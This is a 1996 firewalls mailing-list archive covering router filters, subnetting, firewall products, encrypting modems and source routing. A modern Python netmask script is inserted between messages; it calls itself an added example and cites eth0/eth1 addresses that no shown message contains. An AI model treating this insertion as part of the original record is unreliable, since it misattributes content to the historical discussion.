FYI: A press release notes Central House Technologies, dba IMA Tech, will distribute software that scans email and attached documents for viruses. The product, Mimesweeper, is priced at $2,875 for 100 users.

Mimesweeper redirects incoming mail to a mailbox where it is scanned for unidentifiable attachments or viruses. Messages can pass through the network only if they are scanned, according to Central House officials. Mimesweeper runs on Microsoft Windows NT 3.5 and will support Microsoft Mail and Novell's Groupwise software in the near future, CH officials said.
From firewalls-owner Thu Jan 4 10:52:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA13307 for firewalls-outgoing; Thu, 4 Jan 1996 10:48:27 -0800 (PST)
Received: from geoworks.com (fusion.geoworks.com [198.211.200.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA13291 for ; Thu, 4 Jan 1996 10:48:21 -0800 (PST)
Received: from selenium.geoworks.com.geoworks by geoworks.com (4.1/SMI-4.1) id AA00194; Thu, 4 Jan 96 10:47:11 PST
Date: Thu, 4 Jan 96 10:47:11 PST
From: cdoane@geoworks.com (Chris Doane)
Message-Id: <9601041847.AA00194@geoworks.com>
To: jcp@tis.com, ROMEO@mail.co.stanislaus.ca.us
Subject: Re: Livingston Firewall IRX router -Reply
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I think Mr. Romeo's mail pretty well covered the features found in the Firewall IRX, but here's something else to consider:

Livingston's "free" support is the worst I've ever encountered, expect at the very least a one week turn-around on calls, and this after repeated daily attempts to speak with an engineer. Documentation is abysmal, even the newer version available as a .ps file on their ftp server. I could live with this, except that I've discovered some undocumented features that have caused me grave headaches (i.e., setting an IP filter automatically denies all IPX traffic - IPX filtering is extremely poorly documented, not a single example of the syntax).

This has been my experience for every occasion I've had to contact Livingston, I would not mention these problems except that I've found this aggravation to far outweigh the benefits of the product.
Sincerely,
Chris Doane

From firewalls-owner Thu Jan 4 11:27:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA13659 for firewalls-outgoing; Thu, 4 Jan 1996 11:10:39 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA13653 for ; Thu, 4 Jan 1996 11:10:34 -0800 (PST)
Received: from uucp2.UU.NET by relay5.UU.NET with SMTP id QQzxce24629; Thu, 4 Jan 1996 14:09:56 -0500 (EST)
Received: from vanguard.UUCP by uucp2.UU.NET with UUCP/RMAIL ; Thu, 4 Jan 1996 14:09:56 -0500
Received: by vanguard.hmp.com (UUPC/extended 1.12b); Thu, 04 Jan 1996 11:32:04 MST
Date: Thu, 04 Jan 1996 11:31:58 MST
From: "Scott Deshaies"
Message-ID: <30ec1d24.vanguard@vanguard.hmp.com>
Organization: High Mountain Press, Inc.
Reply-To: "Scott Deshaies"
To: "Mike Romeo"
Cc: "Firewalls Mailing List"
Subject: Re: Livingston Firewall IRX router -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 04 Jan 1996 09:46:32 -0800, "Mike Romeo" wrote:

> Setup was easy, but when you update the filter list there is no way to
> insert a rule so you have to rekey all the rules after the one you insert
> which allows a lot of room for finger checks and can cause an
> inadvertent hole in your system. The packet filtering syntax is less
> cryptic than CISCO's (IMHO)

If you use PMConsole, you can insert a line and it does the magic of moving all of the lower rules down for you. (At least it seems to in PMConsole for Windows - I can't vouch for the X version)

--
>> Scott R. Deshaies  <>  High Mountain Press, Inc.                     <<
>> MIS Manager        <>  2530 Camino Entrada * Santa Fe, NM 87505      <<
>> sdeshaies@hmp.com  <>  Direct:505/474-5103     http://www.hmp.com    <<

From firewalls-owner Thu Jan 4 13:22:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16920 for firewalls-outgoing; Thu, 4 Jan 1996 13:15:19 -0800 (PST)
Received: from calima (CALIMA.CIAT.CGIAR.ORG [198.93.225.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16913 for ; Thu, 4 Jan 1996 13:15:13 -0800 (PST)
Received: by calima (Smail3.1.29.1 #1) id m0tXv7g-00032VC; Thu, 4 Jan 96 16:14 WDT
Date: Thu, 4 Jan 1996 16:14:48 -0300 (WDT)
From: Juan Carlos Machado
X-Sender: juank@calima
To: firewalls@greatcircle.com
Subject: Xtacacs client software for Windows
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

For people interested in TACACS client software for Windows, this is available at

    ftp.cica.indiana.edu/pub/pc/win3/winsock/xtacac12.zip

If information is needed about installation and configuration, feel free to contact me.

Juank,
_________________________________________________________
=========================================================
Juan Carlos Machado Z.          jmachado@calima.ciat.cgiar.org
                                j.machado@cgnet.com
Network Support                 Voice Ph#: (57-2)4450-422
>>>>>>>>>>>>>>>>>>>>>>>>>> :) <<<<<<<<<<<<<<<<<<<<<<<<<<<
CIAT (International Center for Tropical Agriculture)
Cali - Valle - Colombia.        Phone: 4450000
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
JK:= NOT(reflect(opinions' self,opinions' employer));

From firewalls-owner Thu Jan 4 15:37:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA19535 for firewalls-outgoing; Thu, 4 Jan 1996 15:25:34 -0800 (PST)
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA19525 for ; Thu, 4 Jan 1996 15:25:13 -0800 (PST)
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA28192; Fri, 5 Jan 1996 09:18:35 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma028173; Fri Jan 5 09:18:14 1996
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA19977; Fri, 5 Jan 1996 09:23:46 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9601042323.AA19977@citecub.citec.qld.gov.au>
Subject: Re: Bastion netmask query
To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Date: Fri, 5 Jan 1996 09:23:45 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <9601041534.AA07331@manzanita.DEV.3Com.COM.noname> from "Bob Konigsberg" at Jan 4, 96 07:34:31 am
X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My mailer thinks Bob Konigsberg said:
> [picture chomped]
>
> First of all, these nets are using three different subnet
> classification schemes. This can cause problems unless carefully managed.
>
> The subnet mask 255.255.255.240 will divide your class C
> address space into 16 subnets of 15 hosts each
>     A.B.C.0,   A.B.C.16,  A.B.C.32,  A.B.C.48,
>     A.B.C.64,  A.B.C.80,  A.B.C.96,  A.B.C.112,
>     A.B.C.128, A.B.C.144, A.B.C.160, A.B.C.176,
>     A.B.C.192, A.B.C.208, A.B.C.224, A.B.C.240.
>
> The subnet mask 255.255.255.224 will effectively divide your class C
> address space into 8 subnets of 31 hosts each:
>     A.B.C.0,   A.B.C.32,  A.B.C.64,  A.B.C.96,
>     A.B.C.128, A.B.C.160, A.B.C.192, A.B.C.224.
>
> The subnet mask 255.255.255.192 will divide your class C into 4 subnets
> of 63 hosts each.
>     A.B.C.0,   A.B.C.64,
>     A.B.C.128, A.B.C.192.
>

The network people here will not allow the first and last subnets to be used because there are too many systems around that do not support the classless routing required. Apparently these systems work out whether the address is an A, B or C and then applies the netmask. Thus A.B.C.0 subnetted is no different to A.B.C.0 w/o subnet and A.B.C.192 has a "network address" of all "1"s which is the broadcast address.

Anyone care to comment?

[chomp the rest]

Colin

From firewalls-owner Thu Jan 4 16:52:26 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA21754 for firewalls-outgoing; Thu, 4 Jan 1996 16:38:11 -0800 (PST)
Received: from venera.isi.edu (venera.isi.edu [128.9.0.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA21743 for ; Thu, 4 Jan 1996 16:38:07 -0800 (PST)
From: bmanning@ISI.EDU
Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Thu, 4 Jan 1996 16:37:13 -0800
Posted-Date: Thu, 4 Jan 1996 16:29:59 -0800 (PST)
Message-Id: <199601050029.AA07586@zed.isi.edu>
Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Thu, 4 Jan 1996 16:29:59 -0800
Subject: Re: Bastion netmask query
To: sgcccdc@citec.qld.gov.au (Colin Campbell)
Date: Thu, 4 Jan 1996 16:29:59 -0800 (PST)
Cc: bobk@manzanita.dev.3com.com, firewalls@greatcircle.com
In-Reply-To: <9601042323.AA19977@citecub.citec.qld.gov.au> from "Colin Campbell" at Jan 5, 96 09:23:45 am
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > The subnet mask 255.255.255.192 will divide your class C into 4 subnets
> > of 63 hosts each.
> >     A.B.C.0,   A.B.C.64,
> >     A.B.C.128, A.B.C.192.
> >
>
> The network people here will not allow the first and last subnets to be
> used because there are too many systems around that do not support the
> classless routing required. Apparently these systems work out whether
> the address is an A, B or C and then applies the netmask. Thus A.B.C.0
> subnetted is no different to A.B.C.0 w/o subnet and A.B.C.192 has a
> "network address" of all "1"s which is the broadcast address.
>
> Anyone care to comment?
>
> Colin

Two RFC's:

RFC 1878 - Variable Length Subnet Table For IPv4
RFC 1597 - Private Networks.

--
--bill

From firewalls-owner Thu Jan 4 19:37:28 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24534 for firewalls-outgoing; Thu, 4 Jan 1996 19:28:07 -0800 (PST)
Received: from ix8.ix.netcom.com (ix8.ix.netcom.com [199.182.120.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA24529 for ; Thu, 4 Jan 1996 19:28:04 -0800 (PST)
Received: from ix-wp1-20.ix.netcom.com by ix8.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id TAA20010; Thu, 4 Jan 1996 19:27:26 -0800
Date: Thu, 4 Jan 1996 19:27:26 -0800
Message-Id: <199601050327.TAA20010@ix8.ix.netcom.com>
X-Sender: sgfarkas@ix.netcom.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: SorG Farkas
Subject: Gauntlet from TIS
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

If any of you has experience with Gauntlet, I would appreciate any info about it (if it does what it promises, if it's reliable, any problems you encountered, any do's and don'ts, experience with the support from them, etc.). We are considering it for my company.

Thanks a lot.
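A worked version of the netmask arithmetic from the "Bastion netmask query" thread above (Bob Konigsberg's subnet tables, Colin Campbell's caution about the first and last subnets, and the original poster's eth0/eth1 addresses). This is an added example, not code from any message in the archive; it uses 192.0.2.0/24 as a constructed stand-in for the poster's A.B.C.0 and nothing beyond the Python standard library.

```python
"""Netmask arithmetic for a class C split the way the thread describes.

Added example (not from the list archive). 192.0.2.0/24 stands in for the
poster's A.B.C.0; only the Python standard library is used.
"""
import ipaddress

# Constructed stand-in for the poster's class C "A.B.C.0".
CLASS_C = ipaddress.ip_network("192.0.2.0/24")


def prefix_for_mask(mask):
    """Dotted mask (255.255.255.240) -> prefix length (28)."""
    return ipaddress.ip_network(f"0.0.0.0/{mask}").prefixlen


def subnet_table(parent, mask):
    """Bob's table: (network, broadcast, usable hosts) for each subnet of
    `parent` under `mask`. Usable hosts exclude the network and broadcast
    addresses, so a /28 gives 14 rather than the 15 quoted in the thread."""
    rows = []
    for sub in parent.subnets(new_prefix=prefix_for_mask(mask)):
        rows.append((str(sub.network_address),
                     str(sub.broadcast_address),
                     sub.num_addresses - 2))
    return rows


def interface_params(address, mask):
    """What an interface configured as address/mask will use for its
    network, broadcast and netmask, and whether the address is even legal
    for a host (the network and broadcast addresses are not)."""
    iface = ipaddress.ip_interface(f"{address}/{mask}")
    net = iface.network
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask": str(net.netmask),
        "usable_host_address": iface.ip not in (net.network_address,
                                                net.broadcast_address),
    }


def is_first_or_last_subnet(subnet, parent):
    """Colin's point: the all-zeros and all-ones subnets of `parent` look
    like the unsubnetted net (or its broadcast) to classful hosts."""
    sub = ipaddress.ip_network(subnet)
    offset = int(sub.network_address) - int(parent.network_address)
    index = offset >> (32 - sub.prefixlen)
    count = 2 ** (sub.prefixlen - parent.prefixlen)
    return index in (0, count - 1)


def same_subnet(addr_a, addr_b, mask):
    """True when two hosts would consider each other on-link under `mask`."""
    return (ipaddress.ip_interface(f"{addr_a}/{mask}").network
            == ipaddress.ip_interface(f"{addr_b}/{mask}").network)


if __name__ == "__main__":
    for mask in ("255.255.255.240", "255.255.255.224", "255.255.255.192"):
        rows = subnet_table(CLASS_C, mask)
        print(f"{mask}: {len(rows)} subnets, {rows[0][2]} usable hosts each")
        for net, bcast, _ in rows:
            flagged = is_first_or_last_subnet(f"{net}/{mask}", CLASS_C)
            note = "  <- first/last subnet" if flagged else ""
            print(f"  {net:<12} broadcast {bcast}{note}")
    # The poster's eth0 is A.B.C.31 on the .16-.31 subnet: under the /28
    # that range implies, .31 is that subnet's broadcast address. eth1 is
    # A.B.C.32: under a /27, .32 is the network address of .32-.63.
    print(interface_params("192.0.2.31", "255.255.255.240"))
    print(interface_params("192.0.2.32", "255.255.255.224"))
```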
From firewalls-owner Thu Jan 4 19:55:32 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24458 for firewalls-outgoing; Thu, 4 Jan 1996 19:21:35 -0800 (PST)
Received: from kinks.eng.usf.edu (kinks.eng.usf.edu [131.247.14.94]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id TAA24453 for ; Thu, 4 Jan 1996 19:21:32 -0800 (PST)
Received: (from black@localhost) by kinks.eng.usf.edu (8.7.1/8.7.1) id WAA07917; Thu, 4 Jan 1996 22:20:49 -0500 (EST)
Date: Thu, 4 Jan 1996 22:20:48 -0500 (EST)
From: James Black
X-Sender: black@kinks
To: firewalls@greatcircle.com
Subject: sorry, wrong heading
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

Sorry for sending an improper message, I used the wrong heading.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
"An idea that is not dangerous is unworthy of being called an idea at all."
                                                              Oscar Wilde
**************************************************************************

From firewalls-owner Thu Jan 4 20:07:25 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA24490 for firewalls-outgoing; Thu, 4 Jan 1996 19:24:19 -0800 (PST)
Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA24485 for ; Thu, 4 Jan 1996 19:24:15 -0800 (PST)
Received: by relay.ashton.csc.com; id WAA22835; Thu, 4 Jan 1996 22:23:26 -0500
Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma022831; Thu, 4 Jan 96 22:23:19 -0500
Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id WAA07347; Thu, 4 Jan 1996 22:36:36 -0500
From: Chris Kostick
Message-Id: <199601050336.WAA07347@mccoy.ashton.csc.com>
Subject: Summary of encrypting modems
To: firewalls@greatcircle.com
Date: Thu, 4 Jan 1996 22:36:36 -0500 (EST)
Cc: john.malouf@hksystems.com (John Malouf)
In-Reply-To: <199601031546.KAA18448@relay.ashton.csc.com> from "John Malouf" at Jan 3, 96 08:48:52 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A summary of encrypting modems and vendors in response to the post I put out.

>Can anyone provide me a list of vendors who make encrypting modems?
>That is, a modem with encryption in hardware rather than software
>on a machine just sending out over a modem.
>
>--
>chris

-- RESPONSE --

Contact Paralon Technologies in Bellview (Sp?) Washington for an 'encrypting black box' that goes between the modem and the serial port and works with regular modems... Far cheaper than encrypting modems. It is hardware DES encryption... with a negotiated session key.

-- RESPONSE --

This is in answer to your request for info on encrypting modems...
I recently received info from a local consulting firm about the SafeNet solutions from Information Resource Engineering, Inc. (IRE). All I really have is a brochure, but it gives some numbers etc for contacting IRE directly. Here you go, I hope this helps.

    Information Resource Engineering, Inc.
    8029 Corporate Drive
    Baltimore, Maryland 21236
    (410)931-7500
    (410)931-7524 FAX

-- RESPONSE --

the top of the line zyxel does v.34, isdn, and hardware des encryption. don't know how it negotiates the encryption parameters, so you probably have to use them in pairs.

-- RESPONSE --

look at http://www.netcomm.com.au/2_produc/smartmdm.htm for the SmartModem product. it says encryption, but unclear as to how it's implemented.

-- RESPONSE --

Chris,

Here is an old list of Modem Encryption vendors I had. This is old and they may have combined with another company or moved but here they are. I have worked with vendors Jones Futurex and Racal-Milgo quite a bit with some of their products. This is not an endorsement for any of these vendors:

Old Security Modem Vendors List:

    Adaptive Computer Technologies, CA    415 324-0121
    Anchor Automation, CA                 818 998-6100
    AT&T, NJ                              201 221-2200
    Bizcomp Corp, CA                      408 733-7800
    CASE/Datatel, Inc NJ                  609 424-4451
    Cermetek Microelectronics Inc, CA     408 752-5000
    Codex Corp, MA                        617 364-2000
    Concord Data Systems Inc, MA          508 460-0808
    CXR Telcom/Anderson Jacobson, CA      408 435-8520
    Data Race, Inc, TX                    512 692-3909
    Datec, Inc, NC                        800 334-7722
    Digital Pathways, Inc, CA             415 964-0707
    Emucom, Inc,                          508 970-1189
    Fastcomm Data Corp, VA                703 620-3900
    Gandalf Data Inc,                     312 541-6060, 800 GANDALF
    Jones Futurex, CA                     916 632-3456
    Microcom Inc, MA                      508 551-1000
    Natural Microsystems Corp, MA         508 655-0700
    NEC America, Inc, CA                  408 433-1250
    Octocom Systems, MA                   508 658-6050
    Okidata Corp, NJ                      609 235-2600
    Prometheus Productions, Inc, OR       503 624-0571
    Racal-Milgo, Inc, FL                  305 476-5609, 800 327-4440
    Racal-Vadic, Inc CA                   408 946-2227
    Singer Data Products Inc, IL          312 860-6500
    Transend Corp, CA                     415 851-3402
    Tri-Data Systems Inc, CA              408 746-2900
    Universal Data Systems, AL            205 721-8000
    Visionary Electronics, Inc, CA        415 751-8811
    Western DataCom Co, OH                216 835-1510
    ZyXEL, CA                             714 693-0808

From firewalls-owner Thu Jan 4 23:56:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA28453 for firewalls-outgoing; Thu, 4 Jan 1996 23:51:17 -0800 (PST)
Received: from bbmail1.unisys.com (bbmail1.unisys.com [192.63.200.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA28448 for ; Thu, 4 Jan 1996 23:51:13 -0800 (PST)
Received: from mvdns1.mv-oc.unisys.com (mvdns1.mv.unisys.com [192.59.253.100]) by bbmail1.unisys.com (8.6.12/8.6.12) with SMTP id HAA14906 for ; Fri, 5 Jan 1996 07:50:31 GMT
Received: by mvdns1.mv-oc.unisys.com (4.1/SMI-4.1-1.8) id AA18074; Thu, 4 Jan 96 23:59:20 PST
From: fw@MV-oc.Unisys.COM (Firewall information)
Message-Id: <9601050759.AA18074@mvdns1.mv-oc.unisys.com>
Subject: Re: Firewall-1 Documentation
To: firewalls@greatcircle.com
Date: Thu, 4 Jan 1996 23:59:18 +57823603 (PST)
In-Reply-To: from "Thierry Boivin" at Nov 30, 95 04:40:12 pm
X-Mailer: ELM [version 2.4 PL21]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Actually I have purchased additional copies of the manual for 1.2 for our vendor Qualix (415) 572-0200. I don't know if you can buy them without having purchased the product.

Chris Liebsack
Unisys

>
> >From: F.Wetzels@amc.uva.nl
> >Date: Wed, 29 Nov 1995 09:54:20 +0100
> >Subject: Firewall-1 Documentation
> >To: firewalls@greatcircle.com
> >X-Sun-Charset: US-ASCII
> >Sender: firewalls-owner@GreatCircle.COM
> >Precedence: bulk
> >
> >Hi,
> >
> >I was wondering if there is any documentation about the latest
> >version of the firewall-1 product. I do not mean www.checkpoint.com.
> >(or something like that) but a solid, (now) well written documentation.
> >Or is it delivered on CD? The documentation that came with version
> >1.07 was very poor.
> >
> >
> >
> >Frank.
> >
> >
> Extracted from Solstice FireWall-1 (release 1.2.1) Installation and User's
> Guide:
>
> "All solstice fireWall-1 products are separately licensed and require a
> licence password to enable them. The "solstice Firewall-1 Base Pack"
> includes the documentation for all solstice Firewall-1 products as well as
> all basic software components. These products may be used in demonstration
> mode without obtaining a password."
>
> In France, the price of this "Base Pack" is about 220$.
>
>
> _______________________________________________
> Thierry Boivin
> Control Data Toulouse               /\ ~
> 36 rue Jacques Babinet             /  \/\      /\
> 31100 Toulouse (France)           /     \ \   /  \
> Tel:62115432 Fax:61400842        /  o    \ \ /    \
> Thierry.Boivin@cdc.com          |         \/       \
> _______________________________________________
>
>

From firewalls-owner Fri Jan 5 03:07:34 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA02432 for firewalls-outgoing; Fri, 5 Jan 1996 03:02:30 -0800 (PST)
Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.64]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA02426 for ; Fri, 5 Jan 1996 03:02:18 -0800 (PST)
Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ab07038; 5 Jan 96 10:57 GMT
Received: from splus.demon.co.uk ([158.152.176.47]) by relay-3.mail.demon.net id aa16290; 5 Jan 96 10:55 GMT
Date: Fri, 5 Jan 1996 10:46:15 GMT
From: Ian Miller
Reply-To: firewalls@splus.demon.co.uk
Message-Id: <44@splus.demon.co.uk>
To: firewalls@greatcircle.com
Subject: Re: Re: Livingston Firewall IRX router -Reply
X-Mailer: FIMail V0.9d
X-User: Alpha Test Version Of FI-Mail, DisWin 1.5C:\WINDOWS\DEMON\WINDIS
Lines: 15
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In your message dated Thursday 4, January 1996 you wrote :

> The only problem I've had is that when I try to set up a filter for ICMP
> type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept
> that, so I just blocked all ICMP which can be a pain when we have a
> connectivity problem with our ISP.

I noticed this problem too. It does not seem to accept zero as a 'port number', so you cannot say "eq 0". However it accepts "lt 1" which should be equivalent, which is what I am using. [Though I haven't actually been able to test the filter yet.]

Ian
--

From firewalls-owner Fri Jan 5 05:52:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA04647 for firewalls-outgoing; Fri, 5 Jan 1996 05:43:15 -0800 (PST)
Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA04640 for ; Fri, 5 Jan 1996 05:43:08 -0800 (PST)
Received: from gw.rmcs.cranfield.ac.uk by relay6.UU.NET with SMTP id QQzxfa09454; Fri, 5 Jan 1996 08:42:07 -0500 (EST)
Date: Fri, 5 Jan 1996 13:38:33 GMT
From: Neil
To: firewalls@greatcircle.com
Message-Id: <960105133833.212c@rmcs.cranfield.ac.uk>
Subject: Source Routed Packets
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel with IP packet forwarding turned off.

The only problem is that SunOS will still (I believe) allow IP source routed packets through the bastion host.

Is there a software fix for this available that does not mean buying a screening Cisco or something like that?

Yours Aye,

Neil

* Neil A Carson
* The Royal Military College of Science, Shrivenham
* e-mail carson@rmcs.cranfield.ac.uk
* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home)

From firewalls-owner Fri Jan 5 06:52:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05410 for firewalls-outgoing; Fri, 5 Jan 1996 06:38:33 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA05405 for ; Fri, 5 Jan 1996 06:38:29 -0800 (PST)
Received: from pm1-29.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA07804; Fri, 5 Jan 96 09:37:15 -0500
Date: Fri, 5 Jan 96 09:37:15 -0500
Message-Id: <9601051437.AA07804@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Neil
From: frankw@in.net (Frank Willoughby)
Subject: Re: Source Routed Packets
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Neil,

>I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel
>with IP packet forwarding turned off.
>
>The only problem is that SunOS will still (I believe) allow IP source
>routed packets through the bastion host.
>

It is difficult to tell which firewall you are evaluating. Can you be more specific?

>Is there a software fix for this available that does not mean buying a
>screening Cisco or something like that?
>
> Yours Aye,
>
> Neil
>
>* Neil A Carson
>* The Royal Military College of Science, Shrivenham
>* e-mail carson@rmcs.cranfield.ac.uk
>* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home)

Best Regards,

Frank

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.
From firewalls-owner Fri Jan 5 07:10:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA05861 for firewalls-outgoing; Fri, 5 Jan 1996 07:02:50 -0800 (PST) Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA05855 for ; Fri, 5 Jan 1996 07:02:46 -0800 (PST) Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id KAA24402 for ; Fri, 5 Jan 1996 10:02:08 -0500 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA13057; Fri, 5 Jan 96 10:02:02 EST Date: Fri, 5 Jan 96 10:02:01 EST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: SSL and S-HTTP Proxy support Cc: mckenney@smiley.mitre.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to have an update as to which commercial firewall vendors support or plan to support (when) an SSL and/or S-HTTP proxy. I will post a summary. This is the information that I have: 1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. 2. KarlBridge/KarlBrouter: S-HTTP proxy 3. Milkyway Blackhole: S--HTTP 4. SOS Brimstone: S-HTTP proxy 5. Technologic Interceptor: S-HTTP proxy 6. V-One SmartWall: S-HTTP proxy License versions of TIS Gauntlet will support whatever the next Gauntlet release supports. -Brian Respectfully, Brian W. 
McKenney (mckenney@mitre.org) Network Security Engineering The MITRE Corporation Mail Stop: Z-231 7525 Colshire Drive McLean, VA 22102 Voice: 703-883-5463 Fax: 703-883-1245 From firewalls-owner Fri Jan 5 07:55:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06299 for firewalls-outgoing; Fri, 5 Jan 1996 07:26:10 -0800 (PST) Received: from colt.milepost.com (colt.milepost.com [164.57.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA06294 for ; Fri, 5 Jan 1996 07:26:04 -0800 (PST) Received: (from phil@localhost) by colt.milepost.com (8.6.12/8.6.9) id JAA08470 for firewalls@GreatCircle.COM; Fri, 5 Jan 1996 09:24:38 -0600 From: Phil Howard Message-Id: <199601051524.JAA08470@colt.milepost.com> Subject: Re: Re: Livingston Firewall IRX router -Reply To: firewalls@GreatCircle.COM Date: Fri, 5 Jan 1996 09:24:37 -0600 (CST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian Miller writes... > > The only problem I've had is that when I try to set up a filter for ICMP > > type 0 (ECHO REPLY if I read the RFC correctly) it refuses to accept > > that, so I just blocked all ICMP which can be a pain when we have a > > connectivity problem with our ISP. > > I noticed this problem too. It does not seem to accept zero as a 'port number', > so you cannot say "eq 0". However it accepts "lt 1" which should be equivalent, > which is what I am using. [Though I haven't actually been about to test the > filter yet.] Hmmm. They told me this would be fixed when I reported it over a year ago. -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! 
| phil@milepost.com +-------------------------------------------------+

